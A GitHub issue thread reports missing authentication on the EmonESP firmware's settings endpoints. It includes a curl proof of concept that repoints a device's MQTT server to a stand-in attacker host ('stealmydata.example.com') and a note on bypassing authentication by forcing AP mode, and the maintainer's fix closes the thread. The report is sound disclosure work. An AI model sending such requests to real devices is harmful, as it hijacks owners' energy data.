openenergymonitor/EmonESP #12: Possible to change settings with no user/password

jeremypoulter, 2016-08-11:
The endpoints to save the settings do not have any checks to validate the username/password;

```
  server.on("/savenetwork", handleSaveNetwork);
  server.on("/saveemoncms", handleSaveEmoncms);
  server.on("/savemqtt", handleSaveMqtt);
```

So you could do something like this;

```
curl 'http://172.16.0.72/savemqtt' -H 'Origin: http://172.16.0.72' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-GB,en-US;q=0.8,en;q=0.6' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36' -H 'Content-type: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Referer: http://172.16.0.72/' -H 'Connection: keep-alive' --data '&server=stealmydata.example.com&topic=jeremypoulter/f&prefix=test-&user=&pass=' --compressed
```

and this will change the MQTT server without asking for credentials.

jeremypoulter, 2016-08-11:
I am also not to sure it is a good idea to make the authentication defendant on the WiFi mode as you can change this by forcing the ESP to disconnect from the WiFi and in to AP mode.

```
  if(www_username!="" && !server.authenticate(www_username, www_password) && wifi_mode == 0)
    return server.requestAuthentication();
```

glynhudson, 2016-08-13:
Totally agree, just made the changes https://github.com/openenergymonitor/EmonESP/commit/cfdc11f5fa985683caade4fbade2ef774dd30a1b

glynhudson, 2016-08-13:
I've also removed the www password from being displayed in /status

commit cfdc11f5 (2016-08-13): fix #12, improved security
closed 2016-08-13 by glynhudson